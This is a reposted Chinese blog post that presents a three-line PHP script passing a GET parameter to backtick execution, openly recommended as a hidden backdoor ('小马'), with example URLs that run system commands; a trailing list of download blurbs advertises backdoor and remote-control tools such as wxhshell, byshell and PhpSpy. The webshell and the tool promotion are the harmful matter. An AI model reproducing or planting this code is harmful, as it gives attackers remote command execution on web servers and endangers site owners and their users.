`

<转载>一个官方没有公布的php秘籍,可用作后门

 
阅读更多

可以看看

http://www.webshell.cc/3303.html

好奇怪的漏洞?

可以当做个小马使用,比较有意思的一个东西

写道
被过滤广告
发现这个也是巧合,我就直接说了吧

<?php
//t.php
$test = $_GET['r'];
echo `$test`;
?>大家看看这个代码有木有问题?

这里是我们自己的交流平台,是属于我们90sec所有成员的技术分享平台! 我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了,

信息安全团队 而且又不是单引号,这个就是关键所在了,这个符号是 Esc 下面的一个键 感叹号!旁边的,

专注信息安全通过 echo `系统命令`; 可以达到 system(); 一样的效果

如果不信的朋友可以测试

http://webshell.cc/t.php?r=dir

可以列出目录

http://webshell.cc/t.php?r=echo

我是马儿 D:\web\webshell.cc.php

大家觉得我没有忽悠 就赏点分哈


文章来自: WebShell'S Blog 本文地址:http://www.webshell.cc/3303.html

 

 

 

分享到:
评论
1 楼 hoodbc 2012-09-13  
shell_exec 没有禁用

相关推荐

    C# 给自己的软件添加后门

    运行程序, 选中写有“翻版必究”的文本框,依次按下: &lt;Esc&gt; &lt;H&gt; &lt;E&gt; &lt;L&gt; &lt;L&gt; &lt;O&gt; &lt;Enter&gt; 键, 隐藏按钮出现 依次按下: &lt;Esc&gt; &lt;B&gt; &lt;Y&gt; &lt;E&gt; &lt;Enter&gt; 键, 隐藏按钮消失 各位可参考也给自己的软件添加个案件后门...

    后门程序源码wxhshell

    winshell是一个非常不错的后门程序,但是现在已经&lt;br&gt;有些过时了,于是我写了一个新的wxhshell,在这款后门里我采用了端口复用技术,因此可&lt;br&gt;以突破一些防火墙。其运行不影响正常端口的工作。&lt;br&gt;注意:本后门对于...

    防火墙与因特网安全

    TCP/IP概述 13&lt;br&gt;2.1 不同的协议层 13&lt;br&gt;2.1.1 IP 13&lt;br&gt;2.1.2 ARP 15&lt;br&gt;2.1.3 TCP 15&lt;br&gt;2.1.4 UDP 17&lt;br&gt;2.1.5 ICMP 18&lt;br&gt;2.2 路由器和路由协议 18&lt;br&gt;2.3 域名系统 19&lt;br&gt;2.4 标准服务 21&lt;br&gt;2.4.1 SMTP 21...

    FREENESS(个人助理[交流、管理、上网安全]) v2.1

    上网时,一个不小心,就会给这些网页把IE和注册表搞得乱七&lt;br&gt; 八糟的,甚至给偷偷在计算机里安装了后门程序,造成个人信&lt;br&gt; 息的泄漏,本功能就是提供IE和注册表的恢复功能,并可注销&lt;br&gt; 引起漏洞的微软控件来...

    netcat

    它被设计成一个稳定的后门工具, &lt;br&gt;能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几 &lt;br&gt;乎所有类型的网络连接&lt;br&gt;&lt;br&gt;输入'nc.exe -h' 即可看到各参数的...

    动网论坛 7.1sp1管理员工具

    &lt;br&gt; &lt;br&gt; 4、欢迎访问动网论坛官方网站(Aspsky.Net)和官方讨论区(Bbs.Dvbbs.Net)。&lt;br&gt; &lt;br&gt; 5、功能简介:&lt;br&gt; A 在删除了所有管理员情况下,新建admin帐号。&lt;br&gt; B 修改某一用户密码并提升为管理员。&lt;br&gt; C 当...

    IceLight V1.3.44[一线光-无驱,恢复SSDT,可杀IS,SS]

    自启动&lt;br&gt;&lt;br&gt;这是一个新增的模块区域,主要用来管理系统中自动启动的信息.当然可能还存有&lt;br&gt;不完善地方,所以还有待考验.&lt;br&gt;&lt;br&gt;该区域中包括:注册表启动\IE浏览器\Winlogon\开始菜单启动&lt;br&gt;&lt;br&gt;&lt;br&gt;四.杀进程&lt;br...

    动网最新管理员工具 dvbbs 7.0 sp2

    &lt;br&gt; &lt;br&gt; 4、欢迎访问动网论坛官方网站(Aspsky.Net)和官方讨论区(Bbs.Dvbbs.Net)。&lt;br&gt; &lt;br&gt; 5、功能简介:&lt;br&gt; A 在删除了所有管理员情况下,新建admin帐号。&lt;br&gt; B 修改某一用户密码并提升为管理员。&lt;br&gt; C 当...

    X-Scan

    &lt;br&gt; “选择脚本” - 打开脚本选择窗口,通过风险级别、检测手段、漏洞类型等分类方式定制脚本列表&lt;br&gt; “脚本运行超时(秒)” - 设置一个脚本可运行的最长时间,超时后将被强行终止&lt;br&gt; “网络读取超时(秒)” - ...

    AspToDll风火轮

    &lt;br&gt; 4:提供一个页面对应一个dll的批量自动编译排错,便于快速调试,节省时间。&lt;br&gt; 5:支持隔离封装,只封装之内的代码,之外的代码留在页面中,便于修改界面而不必重新发布Dll。&lt;br&gt; 6:支持域名或IP绑定,...

    好赚钱联盟HTML[美化版]

    &lt;br&gt;转载请保留全部信息&lt;br&gt;网站使用:asp+access(mdb)&lt;br&gt;网站前台演示:http://www.haozhuanqian.com&lt;br&gt;网站后台:web_manage/login.asp web_manage文件夹均勿必要修改&lt;br&gt;管理员帐号和密码均是:admin admin&lt;br...

    内核级后门Rootkit技术.ppt [评价可免费]

    &lt;br&gt; Rootkit与普通木马后门以及病毒的区别&lt;br&gt;Rootkit宗旨:隐蔽 &lt;br&gt; 通信隐蔽、自启动项隐藏、文件隐藏、进程/模块隐藏、注册表隐藏、服务隐藏、端口隐藏 etc.&lt;br&gt;研究内核级后门 Rootkit 技术的必要性&lt;br&gt; 事物...

    【软件加密技术内幕】

    7.4.2 做一个带sdk的壳&lt;br/&gt;&lt;br/&gt;7.5 后记:关于壳和程序的思考&lt;br/&gt;&lt;br/&gt; &lt;br/&gt;&lt;br/&gt; &lt;br/&gt;&lt;br/&gt;第8章 Visual Basic 6 逆向工程&lt;br/&gt;&lt;br/&gt;8.1 简介&lt;br/&gt;&lt;br/&gt;8.2 P-code传奇&lt;br/&gt;&lt;br/&gt;8.3 VB编译奥秘&lt;br/&gt;&lt;br/&gt;8.4 ...

    软件加密技术内幕

    7.4.2 做一个带sdk的壳&lt;br/&gt;&lt;br/&gt;7.5 后记:关于壳和程序的思考&lt;br/&gt;&lt;br/&gt; &lt;br/&gt;&lt;br/&gt; &lt;br/&gt;&lt;br/&gt;第8章 Visual Basic 6 逆向工程&lt;br/&gt;&lt;br/&gt;8.1 简介&lt;br/&gt;&lt;br/&gt;8.2 P-code传奇&lt;br/&gt;&lt;br/&gt;8.3 VB编译奥秘&lt;br/&gt;&lt;br/&gt;8.4 ...

    中汇人才网1.03升级版

    我为客户写的人才网站,绝对完整无错无后门---中汇人才网1.03版(7月9日晚上20点发布)&lt;br&gt;&lt;br&gt;中汇人才网 1.03版&lt;br&gt;&lt;br&gt;1.03版修改内容如下&lt;br&gt;&lt;br&gt;修正了 &lt;br&gt;&lt;br&gt;人才网首页 index.asp 中广告部分的logo尽寸,由原先...

    .htaccess

    &lt;br&gt;&lt;br&gt;You can block an IP address by using:&lt;br&gt;你可以使用以下命令封禁一个IP地址:&lt;br&gt;&lt;br&gt;deny from 000.000.000.000&lt;br&gt;where 000.000.000.000 is the IP address. If you only specify 1 or 2 of the ...

    PhpSpy 2005 精简版

    PhpSpy是一个用PHP语言编写的在线管理程序,同时集成很多和海阳顶端网所类似的功能,也可以说是一个WEB方式的后门,PHP的同类程序有几个,但多多少少有些缺陷,我结合现有的攻击手法,本着实用、简洁、小巧的原则,...

    byshell远程控制

    那个byshell0.64的网络传输稳定性不是很好,因此把前一个版本的0.63也放上来了。&lt;br&gt; 大家如果发现0.64不能用,可以试试这个。&lt;br&gt; byshell v0.63&lt;br&gt; author:"by"&lt;br&gt; byshell v0.63,用户态实现无进程无DLL无...

    隐藏文件夹

    这个东西利用了微软的一个Bug,不知道算不算Bug还是他们给自己留的后门之类的东西,一键还原精灵就是利用这个保存自己的文件夹的,大家可以看一下。&lt;br&gt;“加密”后的文件夹打不开,删不掉,无法复制&lt;br&gt;&lt;br&gt;密码是...

Global site tag (gtag.js) - Google Analytics